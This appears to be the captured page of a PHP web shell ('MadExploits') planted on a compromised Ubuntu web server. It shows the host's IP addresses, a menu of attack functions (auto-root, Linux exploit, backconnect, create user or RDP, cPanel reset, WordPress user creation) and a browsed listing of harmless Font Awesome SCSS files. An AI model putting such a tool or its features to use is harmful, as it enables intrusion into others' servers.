Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.15.158.134
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings /
public /
font-awesome /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
_animated.scss
715
B
-rw-rw-r--
_bordered-pulled.scss
592
B
-rw-rw-r--
_core.scss
459
B
-rw-rw-r--
_fixed-width.scss
120
B
-rw-rw-r--
_icons.scss
49.31
KB
-rw-rw-r--
_larger.scss
375
B
-rw-rw-r--
_list.scss
378
B
-rw-rw-r--
_mixins.scss
1.6
KB
-rw-rw-r--
_path.scss
783
B
-rw-rw-r--
_rotated-flipped.scss
672
B
-rw-rw-r--
_screen-reader.scss
134
B
-rw-rw-r--
_stacked.scss
482
B
-rw-rw-r--
_variables.scss
22.11
KB
-rw-rw-r--
font-awesome.scss
430
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _animated.scss
// Spinning Icons // -------------------------- .#{$fa-css-prefix}-spin { -webkit-animation: fa-spin 2s infinite linear; animation: fa-spin 2s infinite linear; } .#{$fa-css-prefix}-pulse { -webkit-animation: fa-spin 1s infinite steps(8); animation: fa-spin 1s infinite steps(8); } @-webkit-keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg); transform: rotate(359deg); } } @keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg); transform: rotate(359deg); } }
Close